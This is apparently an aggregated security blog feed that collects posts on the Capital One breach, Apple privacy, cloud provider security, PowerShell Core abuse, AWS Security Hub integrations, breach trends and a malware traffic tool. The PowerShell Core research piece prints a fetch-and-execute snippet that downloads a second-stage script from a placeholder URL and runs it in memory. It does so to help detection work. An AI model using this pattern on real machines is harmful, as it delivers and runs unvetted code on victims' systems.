  • Some buckets (maybe even all) were apparently encrypted, and a lot of the data within those files (which included credit card applications) was encrypted or tokenized. But the impact was still severe.
  • The attacker exfiltrated the data and then discussed it in Slack and on social media.
  • Someone in contact with the attacker saw that information, including attack details in GitHub. This person reported it to Capital One through their reporting program.
  • Capital One immediately involved the FBI and very quickly closed the misconfigurations. They also began their own investigation.
  • They were able to determine exactly what happened very quickly, likely through CloudTrail logs. Those contained the commands issued by that IAM role from that server (which are very easy to find). They could then trace back the associated IP addresses. There are many other details on how they found the attacker in the complaint, and it looks like Capital One did quite a bit of the investigation themselves.

So misconfigured firewall (Security Group?) > compromised instance > IAM role credential extraction > bucket enumeration > data exfiltration. Followed by a rapid response and public notification.

As a side note, it looks like the attacker may have been a former AWS employee, but nothing indicates that was a factor in the breach.

People will say the cloud failed here, but we saw breaches like this long before the cloud was a thing. Containment and investigation seem to have actually run far faster than would have been possible on traditional infrastructure. For example Capital One didn’t need to worry about the attacker turning off local logging – CloudTrail captures everything that touches AWS APIs. Normally we hear about these incidents months or years later, but in this case we went from breach to arrest and disclosure in around two weeks.

I hope that someday Capital One will be able to talk about the details publicly so the rest of us can learn. No matter how good you are, mistakes happen. The hardest problem in security is solving simple problems at scale. Because simple doesn’t scale, and what we do is damn hard to get right every single time.

DisruptOps: Build Your Own Multi-Cloud Security Monitoring in 30 Minutes or Less with StreamAlert

Apple Flexes Its Privacy Muscles

Posted under: Research and Analysis

Apple events follow a very consistent pattern, which rarely changes beyond the details of the content. This consistency has gradually become its own language. Attend enough events and you start to pick up the deliberate undertones Apple wants to communicate, but not express directly. They are the facial and body expressions beneath the words of the slides, demos, and videos.

Five years ago I walked out of the WWDC keynote with a feeling that those undertones were screaming a momentous shift in Apple’s direction. That privacy was emerging as a foundational principle for the company. I wrote up my thoughts at Macworld, laying out my interpretation of Apple’s privacy principles. Privacy was growing in importance at Apple for years before that, but that WWDC keynote was the first time they so clearly articulated that privacy not only mattered, but was being built into foundational technologies.

This year I sat in the WWDC keynote, reading the undertones, and realized that Apple was upping their privacy game to levels never before seen from a major technology company. That beyond improving privacy in their own products, the company is starting to use its market strength to pulse privacy throughout the tendrils that touch the Apple ecosystem.

Regardless of motivations – whether it be altruism, the personal principles of Apple executives, or simply shrewd business strategy – Apple’s stance on privacy is historic and unique in the annals of consumer technology. The real question now isn’t whether they can succeed at a technical level, but whether Apple’s privacy push can withstand the upcoming onslaught from governments, regulators, the courts, and competitors.

Apple has clearly explained that they consider privacy a fundamental human right. Yet history is strewn with the remains of well-intentioned champions of such rights.

How privacy at Apple changed at WWDC19

When discussing these shifts in strategy, at Apple or any other technology firm, it’s important to keep in mind that the changes typically start years before outsiders can see them, and are more gradual than we can perceive. Apple’s privacy extension efforts started at least a couple years before WWDC14, when Apple first started requiring privacy protections to participate in HomeKit and HealthKit.

The most important privacy push from WWDC19 is Sign In with Apple, which offers benefits to both consumers and developers. In WWDC sessions it became clear that Apple is using a carrot and stick approach with developers: the stick is that App Review will require support for Apple’s new service in apps which leverage competing offerings from Google and Facebook, but in exchange developers gain Apple’s high security and fraud prevention. Apple IDs are vetted by Apple and secured with two-factor authentication, and Apple provides developers with the digital equivalent of a thumbs-up or thumbs-down on whether the request is coming from a real human being. Apple uses the same mechanisms to secure iCloud, iTunes, and App Store purchases, so this seems to be a strong indicator.

Apple also emphasized that they extend this privacy to developers themselves: it isn't Apple's business to know how developers engage with users inside their apps. Apple serves as an authentication provider and collects no telemetry on user activity. This isn't to say that Google and Facebook abuse their authentication services: Google denies any such accusation and offers features to detect suspicious activity. Facebook, on the other hand, famously abused phone numbers supplied for two-factor authentication, as well as a wide variety of other user data.

The difference between Sign In with Apple and previous privacy requirements within the iOS and Mac ecosystems is that the feature extends Apple’s privacy reach beyond its own walled garden. Previous requirements, from HomeKit to data usage limitations on apps in the App Store, really only applied to apps on Apple devices. This is technically true for Sign In with Apple, but practically speaking the implications extend much further.

When developers add Apple as an authentication provider on iOS they also need to add it on other platforms if they expect customers to ever use anything other than Apple devices. Either that or support a horrible user experience (which, I hate to say, we will likely see plenty of). Once you create your account with an Apple ID, there are considerable technical complexities to supporting non-Apple login credentials for that account. So providers will likely support Sign In with Apple across their platforms, extending Apple’s privacy reach beyond its own platforms.

Beyond sign-in

Privacy permeated WWDC19 in both presentations and new features, but two more features stand out as examples of Apple extending its privacy reach: a major update to Intelligent Tracking Prevention for web advertising, and HomeKit Secure Video. Privacy preserving ad click attribution is a surprisingly ambitious effort to drive privacy into the ugly user and advertising tracking market, and HomeKit Secure Video offers a new privacy-respecting foundation for video security firms which want to be feature competitive without the mess of building (and securing) their own back-end cloud services.

Intelligent Tracking Prevention is a Safari feature to reduce the ability of services to track users across websites. The idea is that you can and should be able to enable cookies for one trusted site, without having additional trackers monitor you as you browse to other sites. Cross-site tracking is endemic to the web, with typical sites embedding dozens of trackers. This is largely to support advertising and answer a key marketing question: did an ad lead you to visit a target site and buy something?

Effective tracking prevention is an existential risk to online advertisements and the sites which rely on them for income, but this is almost completely the fault of overly intrusive companies. Intelligent Tracking Prevention (combined with other browser privacy and security features) is the stick, and privacy preserving ad click attribution is the corresponding carrot, which promises to let advertisers track conversion rates without violating user privacy. Planned as an upcoming Safari feature and proposed as a web standard, it has the browser remember ad clicks for seven days. If a purchase is made within that period it is considered a potential ad conversion (sale), and reported as a delayed ephemeral post to the search or advertising provider – using a limited set of IDs which are insufficiently granular to be linked to an individual user, after a random time delay to further frustrate individual user identification.

By providing a privacy-preserving advertising technology inside one of the most important and popular web browsers, then offering it as an open standard, all while making herculean efforts to block invasive tracking, Apple is again leveraging its market position to improve privacy and extend its reach. What’s most interesting is that unlike Sign In with Apple, this improves privacy without directly attacking their advertising-driven competitors’ business models. Google can use this same technology and still track ad conversions, and Apple still supports user-manageable ad identifiers for targeted advertisements, accepting less user data to provide better privacy. Of course, a cynic might ask whether more accurate conversion metrics would hurt advertisers who inflate their numbers.

HomeKit security cameras also get a privacy-preserving update with macOS Catalina and iOS 13. I'm a heavy user of cameras myself, even though they are only marginally useful for preventing crime. Nearly all these systems record to the cloud (including my Arlo cameras). This is a feature customers want, clearly demonstrated by the innumerable crime shows where criminals steal the tapes. The providers also use cloud processing to distinguish people from animals from vehicles, and to offer other useful features. But like many customers, I'm not thrilled that providers also have access to my videos, which is one reason none of them run inside my house when anyone is home.

HomeKit Secure Video will encrypt video end-to-end from supported cameras into iCloud, free, kept for 10 days without consuming iCloud storage capacity. If you have an Apple TV or iPad on your home network, it will provide machine learning analysis and image recognition instead of performing any analysis in the cloud. This is an interesting area for Apple to step into. It doesn’t seem likely to drive profits because Apple doesn’t sell its own cameras, and security camera support is hardly driving phone and tablet brand choices. It’s almost like some Apple executive and engineers were personally creeped out by the lack of privacy protection in existing camera systems and said, “Let’s fix this.”

The key to HomeKit Secure Video is that it opens the security video market to a wider range of competitors while protecting consumer privacy. This is a platform, not a product, and it removes manufacturers’ need to build their own back-end cloud service and machine learning capabilities. Less friction to market with better customer privacy.

Apple created a culture of privacy, but will it survive?

These are only a few highlights to demonstrate Apple’s extension of privacy beyond its direct ecosystem, but WWDC was filled with examples. Apple continues to expand privacy features across all their platforms, including the new offline Find My device and customer tracking tool. They now block access to WiFi and Bluetooth data on iOS unless required as a core app feature, since they noticed it being abused for location tracking. Users can also now track the trackers, seeing when and where approved apps accessed their location. The upcoming Apple credit card is the closest thing we are likely to see to a privacy-respecting payment option. Developers will soon be able to mandate that speech recognition in their apps runs on-device, never exposed to the cloud. Privacy enhancements permeate Apple’s upcoming updates, and that’s before we hear anything about new hardware. Apple even dedicated an entire WWDC session to not only its own updates, but also examples of how developers can adopt Apple’s thinking to improve privacy within their own apps.

During John Gruber's The Talk Show Live, Craig Federighi stated that Apple's focus on privacy started back in their earliest days, when the company was founded to create 'personal' computers. Maybe it did and maybe it didn't, but Apple certainly didn't build an effective culture of privacy (or noteworthy technical protection) until the beginning of the iPhone era. When Microsoft launched its highly successful Trustworthy Computing Initiative in 2002 and reversed the company's poor security record, one of its founding principles was "Secure by Design". During Apple's developer-focused Platform State of the Union session, privacy took center stage as Apple talked about "Privacy by Design".

Apple and other tech firms have already run into resistance building secure and private devices and services. Countries, including Australia, are passing laws to break end-to-end encryption and require device backdoors. U.S. law enforcement officials have been laying groundwork for years for laws requiring access, even knowing it would then be impossible to guarantee device security. China requires Apple and other non-Chinese cloud providers to hand over their data centers to Chinese companies, which are legally required to feed information to the Chinese government. Apple's competitors aren't sitting idly by, with Google's Sundar Pichai muddying the waters in a New York Times opinion piece which equates Google security with privacy, and positions Apple-style privacy as a luxury good. Google's security is definitely industry-leading, but equating it with Apple-style privacy is disingenuous at best.

The global forces arrayed against personal privacy are legion. From advertising companies and marketing firms, to governments, to telecommunication providers which monitor all our internet traffic and locations, to the financial services industry, and even to grocery stores offering minor discounts if you’ll just let them correlate all your buying to your phone number. We have a bit of control over some of this tracking, but really we have little control over most of it, and even less insight into how it is used. It’s a safe bet that many of these organizations will push back hard against Apple, and by extension any of us who care about and want to control our own privacy.

Calling privacy a fundamental human right is as strong a position as any company or individual can take. It was one thing for Apple to build privacy into its own ecosystem, but as they extend this privacy outward, it is up to us to decide for ourselves whether we consider these protections meaningful and worthy of support. I know where I stand, but I recognize that privacy is highly personal and I shouldn’t assume a majority of the world feels the same, or that Apple’s efforts will survive the challenges of the next decades.

It’s in our hands now.

– Rich

DisruptOps: The Security Pro’s Quick Comparison: AWS vs. Azure vs. GCP

I’ve seen a huge increase in the number of questions about cloud providers beyond AWS over the past year, especially in recent months. I decided to write up an overview comparison over at DisruptOps. This will be part of a slow-roll series going into the differences across the major security program domains – including monitoring, perimeter security, and security management. Here’s an excerpt:

The problem for security professionals is that security models and controls vary widely across providers, are often poorly documented, and are completely incompatible. Anyone who tells you they can pick up on these nuances in a few weeks or months with a couple training classes is either lying or ignorant. It takes years of hands-on experience to really understand the security ins and outs of a cloud provider.

AWS is the oldest and most mature major cloud provider. This is both good and bad, because some of their enterprise-level options were basically kludged together from underlying services that weren’t architected for the scope of modern cloud deployments. But don’t worry – their competitors are often kludged together at lower levels, creating entirely different sets of issues.

Azure is the provider I run into the most when running projects and assessments. Azure can be maddening at times due to lack of consistency and poor documentation. Many services also default to less secure configurations. For example, if you create a new virtual network and a new virtual machine on it, all ports and protocols are open. AWS and GCP always start with default deny, but Azure starts with default allow.

Like Azure, GCP is more centralized, because many capabilities were planned out from the start – compared to AWS features which were only added a few years ago. Within your account, Projects are isolated from each other except where you connect services. Overall GCP isn’t as mature as AWS, but some services – notably container management and AI – are class leaders.
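One concrete illustration of the Azure default-allow behavior mentioned above: until a network security group is attached, a new virtual network does not filter traffic at all, so a common first step is an NSG whose lowest-priority rule denies all inbound traffic, with targeted allow rules added above it. A minimal sketch with the Az PowerShell module (resource names and location are placeholders):

  # Minimal sketch (Az.Network module assumed; names are placeholders).
  $denyAll = New-AzNetworkSecurityRuleConfig -Name 'DenyAllInbound' `
      -Access Deny -Direction Inbound -Priority 4096 -Protocol '*' `
      -SourceAddressPrefix '*' -SourcePortRange '*' `
      -DestinationAddressPrefix '*' -DestinationPortRange '*'

  New-AzNetworkSecurityGroup -Name 'app-nsg' -ResourceGroupName 'app-rg' `
      -Location 'eastus' -SecurityRules $denyAll
  # Associate 'app-nsg' with the VM's subnet or NIC; without an attached NSG,
  # the new virtual network performs no traffic filtering.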

Proofs of Concept Abusing PowerShell Core: Caveats and Best Practices

by Michael Villanueva and John Sanchez (Threats Analysts)

Threats that abuse PowerShell continue to increase as attackers find ways to use it to deliver banking trojans, backdoors, ransomware, cryptocurrency-mining malware and, more recently, fileless malware and malicious Windows Management Instrumentation (WMI) entries. Indeed, PowerShell’s flexibility and capabilities make it a potent tool in cybercriminal hands. For instance, it can be abused to facilitate exploits, lateral movement within a compromised network, and persistence.

In January 2018, Microsoft announced the availability of PowerShell Core, a cross-platform and open-source version of PowerShell. While it is still under active development, it is similarly expected to draw cybercriminal attention since, like PowerShell, it can be abused to reach platforms beyond Windows.

We explored possible strategies attackers can employ when abusing PowerShell Core. These proofs of concept (PoCs) would help in better understanding — and in turn, detecting and preventing — the common routines and behaviors of possible future threats. The PoCs we developed using PowerShell Core were conducted on Windows, Linux, and macOS. Most of the techniques we applied can be seen in previous threats with PowerShell-based functionalities, such as the fileless KOVTER and POWMET. The scenarios in our PoCs are also based on the PowerShell functions they use.

Note that there are caveats to successfully abusing PowerShell Core. For instance, PowerShell Core is not installed by default on any platform, which means attackers cannot rely on it being present on a machine they want to compromise. On Unix and Unix-like operating systems (OSs), differences in the file system require an attacker to add a line or two to execute any malware: a downloaded ELF file, for example, is not executable until its attributes are modified. PowerShell Core’s functionalities are also under active development, so its security mechanisms against abuse will continue to be fine-tuned.

                 PowerShell                        PowerShell Core
Versions         1.0 — 5.1                         6.0 — 6.x
Update Policy    Bug fixes and security updates    Feature update, bug fixes, and security updates
Platforms        Windows                           Multiplatform
Launched as      powershell.exe                    pwsh.exe (Windows), pwsh (macOS and Linux)
Dependency       .NET Framework                    .NET Core

Table: Comparison of PowerShell and PowerShell Core

As noted in the table above, PowerShell Core can be installed on systems running Windows 7 and later, Linux (Kali, Fedora 27/28, Ubuntu, etc.), macOS 10.12 (Sierra) and later, Windows IoT, and Nano Server.
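For defenders writing inventory or detection scripts, telling the two editions apart at runtime is straightforward; a minimal sketch using only built-in automatic variables:

  # Distinguish Windows PowerShell from PowerShell Core at runtime.
  # PSEdition is 'Desktop' on Windows PowerShell 5.1 (absent on older versions)
  # and 'Core' on PowerShell Core 6.x.
  $PSVersionTable.PSEdition
  $PSVersionTable.PSVersion

  # The $IsWindows / $IsLinux / $IsMacOS automatic variables exist only in
  # PowerShell Core, so check the edition before relying on them.
  if ($PSVersionTable.PSEdition -eq 'Core') {
      "Windows: $IsWindows  Linux: $IsLinux  macOS: $IsMacOS"
  }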

PoCs of malicious activities involving PowerShell Core

Windows: DownloadFile scenario. The infection chain starts with a malicious document attached to a spam email. Once the document’s macro content is enabled, a command line runs a PowerShell Core script to download and execute the intended payload.



Figure 1. Infection chain of a possible threat that abuses PowerShell Core’s DownloadFile on Windows OS (top) and a snapshot of a sample PowerShell Core script that uses DownloadFile to retrieve the payload (bottom)

Linux and macOS: DownloadString scenario. Since the Linux and macOS terminals behave similarly, a threat that abuses PowerShell Core can be executed on both operating systems. Assuming that the malware arrives via spam email or an exploit, we simply created PowerShell scripts to complete the download and execution of the intended final payload. The initial script, executed via the terminal, downloads another PowerShell Core script capable of retrieving the final payload and changing its attribute to “executable”. This is necessary because a file downloaded via the terminal or a PowerShell Core script on Linux and macOS is not executable by default.


Figure 2. Infection chain of a possible threat abusing PowerShell Core’s DownloadString on Linux and macOS


Figure 3. Snapshot of a sample PowerShell Core script that uses DownloadString to retrieve the payload (top), and the downloaded PowerShell script for retrieving and executing the final payload (bottom)
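For reference, the first stage in this scenario boils down to a couple of lines. The sketch below only approximates the pattern described in Figure 3; the URL is a placeholder, not real infrastructure:

  # Illustrative sketch only -- the URL is a placeholder, not real infrastructure.
  # Stage 1: fetch the second-stage script as a string and run it in memory.
  $stage2 = (New-Object System.Net.WebClient).DownloadString('https://example.com/stage2.ps1')
  Invoke-Expression $stage2

  # Stage 2 (the downloaded script) would retrieve the final payload and, because
  # downloaded files on Linux/macOS are not executable by default, add the execute
  # bit before launching it, e.g.:  chmod +x ./payload; ./payload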

Windows: Abusing MultiPoolMiner and PowerShell Core. PowerShell Core can also be abused along with other legitimate and gray tools. For cryptocurrency mining-related activities, we tested out the open-source project MultiPoolMiner, which requires PowerShell Core to run properly.

When replicating this scenario, we first checked the start.bat file inside the MultiPoolMiner package, which includes default commands and parameters (miner wallet, username, worker name, region, currency, etc.). A closer look reveals that it executes a command via PowerShell Core (pwsh); if pwsh is not installed on the system, it downloads and installs PowerShell Core, then retries the execution.


Figure 4. MultiPoolMiner’s Start.bat downloading and executing PowerShell Core

Once executed, the batch file checks the system’s specifications, downloads all of its supported miner applications, and runs a benchmark in order to install the most optimal cryptocurrency miner for the system. Figure 5 shows how the benchmarking and cryptocurrency mining processes are conducted.


Figure 5. MultiPoolMiner’s benchmarking and cryptocurrency mining processes

Best practices
Given the possible impact of PowerShell Core’s abuse, users and businesses should adopt best practices to reduce their exposure to threats that may abuse PowerShell Core:

  • Deploy security mechanisms such as behavior monitoring, which helps detect, monitor, and prevent anomalous and malicious routines and modifications from being fully executed in the system. A good behavior monitoring system not only blocks malware-related routines; it should also be able to monitor and prevent unusual behaviors, such as when PowerShell Core is invoked via a malicious macro embedded in a document.
  • Implement defense in depth: Deploying a sandbox provides an additional layer of security by containing malicious scripts and shellcode. Employing firewalls as well as intrusion detection and prevention systems helps deter behaviors like command-and-control (C&C) communications and data exfiltration.
  • Apply the latest patches (or employ virtual patching) to prevent vulnerabilities from being exploited.
  • Enforce the principle of least privilege: Restrict or secure the use of PowerShell and/or PowerShell Core; disable or remove unnecessary and outdated plug-ins or components to further reduce the system’s attack surface (a sketch of one such control follows this list).
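As a starting point for that last item, script block logging records de-obfuscated PowerShell activity in the Windows event log, where behavior monitoring and SIEM tools can inspect it. A minimal sketch for Windows PowerShell, run from an elevated session (PowerShell Core reads its policies from a separate location, so the equivalent setting must be applied for pwsh as well):

  # Enable script block logging for Windows PowerShell (requires admin rights).
  # Logged blocks appear in the Microsoft-Windows-PowerShell/Operational event log.
  $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
  New-Item -Path $key -Force | Out-Null
  Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord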

This research was presented as “One (S)hell of a Threat: Gateway to Other Platforms” at the AVAR Conference, held on November 28, 2018 in Goa, India.


Imperva Integration With AWS Security Hub: Expanding Customer Security Visibility

This article explains how Imperva application security integrates with AWS Security Hub to give customers better visibility and feedback on the security status of their AWS hosted applications.

Securing AWS Applications

Cost reduction, simplified operations, and other benefits are driving organizations to move more and more applications onto AWS delivery platforms, since AWS takes care of the underlying infrastructure maintenance. As with any migration to a cloud service, however, it’s important to remember that cloud vendors generally implement their services under a Shared Security Responsibility Model. AWS explains this in a whitepaper available here.

Imperva solutions help diverse enterprise organizations maintain consistent protection across all applications in their IT domain (including AWS) by combining multiple defenses against Layer 3-4 and Layer 7 Distributed Denial of Service (DDoS) attacks, the OWASP Top 10 application security risks, and even zero-day attacks. Imperva application security is rated a top solution by both Gartner and Forrester for WAF and DDoS protection.

Visibility Leads to Better Outcomes

WAF security is further enhanced through Imperva Attack Analytics, which uses machine learning to correlate millions of security events across Imperva WAF assets and group them into a small number of prioritized incidents, making security teams more effective by giving them clear and actionable insights.

AWS Security Hub is a new web service that provides a consolidated security view across AWS services as well as third-party solutions. Imperva has integrated its Attack Analytics platform with AWS Security Hub so that the security incidents Attack Analytics generates can be presented in the Security Hub console.

Brief Description of How the Integration Works

The integration works by utilizing an interface developed for AWS Security Hub for what is essentially an “external data connector” called a Findings Provider (FP). The FP enables AWS Security Hub to ingest standardized information from Attack Analytics so that the information can be parsed, sorted and displayed. This FP is freely available to Imperva and AWS customers on Imperva’s GitHub page listed at the end of this article.

Figure 1: Screen Shot of Attack Analytics Incidents in AWS Security Hub

The data flows between Attack Analytics and AWS Security Hub as follows: Attack Analytics exports its security incidents into an AWS S3 bucket within the customer’s account, where the Imperva FP picks them up for upload.

Figure 2: Attack Analytics to AWS Security Hub event flow

To activate AWS Security Hub to use the Imperva FP, customers must configure several things described in the AWS Security Hub documentation. As part of the activation process, the FP running in the customer’s environment needs to acquire a product-import token from AWS Security Hub. Once activated, the FP is authorized to import findings into the customer’s AWS Security Hub account in the AWS Security Finding Format (ASFF), which happens at configurable time intervals.
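The flow is easier to picture with a rough sketch. The one below is illustrative only and is not Imperva’s FP code: it pulls an exported incident from the customer’s S3 bucket using the AWS Tools for PowerShell and maps it onto a few core ASFF fields, which the FP would then submit through Security Hub’s BatchImportFindings API using the product-import token. Bucket, key, account ID, and incident field names are all placeholders.

  # Illustrative sketch only -- not the actual Findings Provider.
  # Assumes the AWS Tools for PowerShell are installed and credentials configured.
  Read-S3Object -BucketName 'example-attack-analytics-export' `
      -Key 'incidents/incident-001.json' -File '.\incident-001.json'
  $incident = Get-Content '.\incident-001.json' -Raw | ConvertFrom-Json

  # Map the incident onto a few core ASFF fields (the $incident field names are
  # placeholders); the FP submits the result via the BatchImportFindings API.
  $finding = @{
      SchemaVersion = '2018-10-08'
      Id            = $incident.id
      GeneratorId   = 'imperva-attack-analytics'
      AwsAccountId  = '111122223333'
      Title         = $incident.title
      CreatedAt     = $incident.firstSeen
      UpdatedAt     = $incident.lastSeen
      Severity      = @{ Label = $incident.severity }
  }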

It’s critically important that organizations maintain robust application security controls as they build or migrate applications to AWS architectures.  Imperva helps organizations ensure every application instance can be protected against both known and zero-day threats, and through integration with AWS Security Hub, Imperva Attack Analytics can ensure organizations always have the most current and most accurate status of their enterprise application security posture.

 

Security Hub is initially being made available as a public preview. We are currently looking for existing Attack Analytics customers who are interested in working with us to refine our integration. If you’re interested in working with us on this, please get in touch. Once Security Hub becomes generally available, we intend to release our Security Hub integration as an open source project on Imperva’s GitHub account.


AWS Security Hub and Deep Security

Deep Security and AWS Security Hub integration

One of the biggest challenges in maintaining your security posture is visibility. You have security controls deployed throughout the stack, and each of these tools is generating its own set of data points and has its own view of your deployment.

Managing the multitude of alerts and events from these tools can quickly get overwhelming. Enter AWS Security Hub.

Announced at AWS re:Invent 2018, this service is available to all AWS users as a public preview. Trend Micro is proud to be a supporting launch partner, allowing customers to send high-value findings from Deep Security to this exciting new service.

What is AWS Security Hub?

AWS Security Hub provides a comprehensive view of your high priority security alerts and compliance status for your AWS deployment. By combining data from Amazon GuardDuty, Amazon Inspector, and Amazon Macie along with a host of APN partner solutions, the AWS Security Hub is a one-stop shop for security visibility.

Each data source provides findings relevant to the tool. Amazon Macie will send findings related to data within the Amazon S3 buckets it monitors, Amazon GuardDuty will provide findings based on the threat detection it performs across your accounts and Amazon EC2 instances, and so forth.

This not only helps you gain visibility and respond to incidents but also helps you monitor ongoing compliance requirements with automated checks against the Center for Internet Security (CIS) AWS Foundations Benchmark.

AWS Security Hub workflow

AWS Security Hub not only brings together this information across your AWS accounts but also prioritizes these findings to help you spot trends, identify potential issues, and take the relevant steps to protect your AWS deployments.

You can read more about AWS Security Hub on the AWS blog.

Instance Security Data

Trend Micro’s Deep Security offers a host of security controls to protect your Amazon EC2 instances and Amazon ECS hosts, helping you to fulfill your responsibilities under the shared responsibility model.

By providing technical controls like intrusion prevention, anti-malware, application control, and others, Deep Security lets you roll out one security tool to address all of your security and compliance requirements.

Read more about the specifics of Deep Security deployed in AWS on the Trend Micro AWS microsite.

As it sits protecting the instance, Deep Security generates a lot of useful security information for compliance, incident response, and forensics. With the integration with AWS Security Hub, high priority information generated by Deep Security will be sent to the service in order to centralize and simplify the view of your deployment’s security across multiple AWS services and APN solutions.

This complements the suite of existing AWS security services and existing Deep Security integrations with AWS WAF, Amazon GuardDuty, Amazon Macie, and Amazon Inspector, helping to bring together all of your critical AWS security data in one simple-to-use service.

Next Steps

The Deep Security integration with the AWS Security Hub is available today on GitHub. This simple integration runs as an AWS Lambda function in your account, sending high priority security events to the new service.

Get started today in just a few minutes with a few easy steps!


Today’s Data Breach Environment: An Overview

By now, companies and consumers alike are well aware of the threat of a data breach. Large and small businesses across every sector have been targeted, and many customers are now familiar with the notification that their username, password or other details might have been compromised.

The unfortunate fact is that, despite efforts on the part of cybersecurity vendors and enterprises, the rate of infection and the vast number of threats continue to rise. Hackers are savvy and can adjust a sample just enough to fly under the radar of advanced security solutions. Worse still, once they’ve broken through the back door, cybercriminals can remain within systems and infrastructure for long periods, stealing and snooping on more sensitive information in the process.

Today, we’re taking a closer look at the overarching environment of data breaches, including the stats and figures that demonstrate the size and impact of current threats, what takes place during and after a breach, and how enterprises can improve their protections.

By the numbers: Top data breach threats

There’s no shortage of facts and data when it comes to data breaches. According to current reports – including Trend Micro’s 2018 Midyear Security Roundup: Unseen Threats, Imminent Losses – some of today’s top threats include:

  • Ransomware: Although Trend Micro discovered only a slight increase in ransomware activity during the first half of 2018, coming in at a 3 percent rise, ransomware continues to pose a threat to enterprise systems everywhere. Even with a 26 percent decrease in the number of newly detected sample families, ransomware is still being put to work, encrypting files and enabling hackers to demand high Bitcoin ransoms.
  • Cryptomining: Unpermitted cryptocurrency mining is also a threat to enterprise security – and may be more dangerous than many organizations realize. Trend Micro researchers found a more than 140 percent increase in malicious cryptocurrency mining activity in the first six months of this year, compared to the same period last year. These programs operate in the background and steal valuable computing and utility resources, driving up costs and scaling back critical performance for legitimate business processes as a result.
  • BEC and email-served malware: Instances of business email compromise, wherein hackers target victims to enable fraudulent wire transfers, are also continuing to impact organizations with foreign partners all over the globe. Making matters worse is that this is far from the only threat that involves the critical communication channel of email – Verizon’s 2018 Data Breach Investigations Report found that 92 percent of all malware is still being served up through malicious emails, including through phishing attacks and the inclusion of infected links or attachments.

Mega breaches on the rise

Once an email recipient opens such a link or attachment, it’s akin to leaving the door wide open for intruders.

Current data shows that it takes an average of 191 days to even realize that a breach has taken place, according to Small Business Trends contributor David William. That’s about 27 weeks, or more than six months.

“This slow response to cyber-attacks is alarming,” William wrote. “It puts small businesses in a precarious position and demonstrates a dire need for cybersecurity awareness and preparedness in every business.”

Compounding this problem is the fact that the longer hackers are able to stay within business systems undetected, the more time they have to steal data and other sensitive intellectual property. This has contributed to a steep rise in mega breaches, Trend Micro research shows, which involve the exposure or compromise of more than one million data records.

Leveraging data from Privacy Rights Clearinghouse, Trend Micro researchers discovered that overall, there has been a 16 percent increase in mega breaches compared to 2017. During the first half of 2018 alone, 259 mega breaches were reported, compared to 224 during the same period in 2017.

Surprisingly, and unfortunately, the majority of these instances came from unintended disclosure of data. Those that resulted from hacking or malware were slightly fewer, and a smaller percentage came as a result of physical data loss.

And, as researchers pointed out, the loss or compromise of data isn’t the only issue to be aware of here.

“There are substantial consequences for enterprises that are hit by data breaches,” Trend Micro researchers wrote. “Recovery and notification costs, revenue losses, patching and downtime issues, and potential legal fees can add up: A mega breach can cost companies up to $350 million.”

How does this happen? Typical steps within a data breach

One of the first things enterprises can do to bolster their security protections is to support increased awareness of data breach processes and what takes place before and during an attack.

In this way, stakeholders – particularly those within the IT team – can be more vigilant and proactive in recognizing security issues or suspicious behaviors that might point to the start of an attack.

As Trend Micro explained, there are several steps that most data breaches include:

  1. Research: Before an attack ever begins, hackers will often carry out research on their target. This might include background research on victims to support phishing and social engineering, or looking into the company’s IT systems to pinpoint unpatched weaknesses or other exploitable vulnerabilities. This step is all about looking for an entrance, or a springboard that cybercriminals can use to launch their attack.
  2. Attack: Once attackers have done their research, they use this knowledge to launch either a network-targeted attack or a social attack.
  3. Network or social attack: As Trend Micro explained, a network attack involves malicious infiltration of the victim’s infrastructure, a particular platform, or an application. A social attack, on the other hand, relies on duping an employee (with a malicious attachment, for example) into providing access to the company network or infrastructure.
  4. Data exfiltration: After successfully infiltrating the company’s systems, attackers seek out sensitive information, often including customer details and payment data. The hacker will then exfiltrate this data, usually to a command-and-control server belonging to the attacker.

Depending upon the business, the industry in which it operates and the type of data stolen, hackers will then either look to sell this information, or use it to support other malicious activity. Attackers will most often look for details like customer names, birth dates, Social Security numbers, email and mailing addresses, phone numbers, bank account numbers, clinical patient information or claims details.

“Hackers search for these data because they can be used to make money by duplicating credit cards, and using personal information for fraud, identity theft, and even blackmail,” Trend Micro stated. “They can also be sold in bulk in Deep Web marketplaces.”

The current breach environment is sophisticated and challenging for overall enterprise security. To find out more about current threats and how your organization can protect its most critical data and systems, connect with the security experts at Trend Micro today.


Malcom – Malware Communication Analyzer


Malcom is a Malware Communication Analyzer designed to analyze a system’s network communication using graphical representations of network traffic, and cross-reference them with known malware sources.

This comes in handy when analyzing how certain malware species try to communicate with the outside world.

Malcom Malware Communication Analyzer Features

Malcom can help you:

  • Detect central command and control (C&C) servers
  • Understand peer-to-peer networks
  • Observe DNS fast-flux infrastructures
  • Quickly determine if a network artifact is ‘known-bad’

The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network.


CITP Call for Visitors for 2019-20

The Center for Information Technology Policy is an interdisciplinary research center at Princeton University that sits at the crossroads of engineering, the social sciences, law, and policy.

CITP seeks applicants for various visiting positions each year. Visitors are expected to live in or near Princeton and to be in residence at CITP on a daily basis. They will conduct research and participate actively in CITP’s programs.

For all visitors, we are happy to hear from anyone working at the intersection of digital technology and public life, including experts in computer science, sociology, economics, law, political science, public policy, information studies, communication, and other related disciplines.

Visitors

All visitors must apply online through the links below. There are three job postings for CITP visitors: 1) the Microsoft Visiting Research Scholar/Professor of Information Technology Policy, 2) Visiting IT Policy Fellow, and 3) IT Policy Researcher.

Microsoft Visiting Research Scholar/Professor of Information Technology Policy

The successful applicant must possess a Ph.D. and will be appointed to a ten-month term, beginning September 1st. The visiting professor must teach one course in technology policy per academic year. Preference will be given to current or past professors in related fields and to nationally or internationally recognized experts in technology policy.

Full consideration of the Microsoft Visiting Research Scholar/Professor of Information Technology Policy position is given to those who apply by the end of December for the upcoming year.

Apply here to become the Microsoft Visiting Research Scholar/Visiting Professor of Information Technology Policy


Visiting IT Policy Fellow

A Visiting IT Policy Fellow is on leave from a full-time position (for example, a professor on sabbatical). The successful applicant must possess an advanced degree and typically will be appointed to a nine-month term, beginning September 1st.

Full consideration for the Visiting IT Policy Fellow is given to those who apply by the end of December for the upcoming year.

Apply here to become a Visiting IT Policy Fellow


IT Policy Researcher

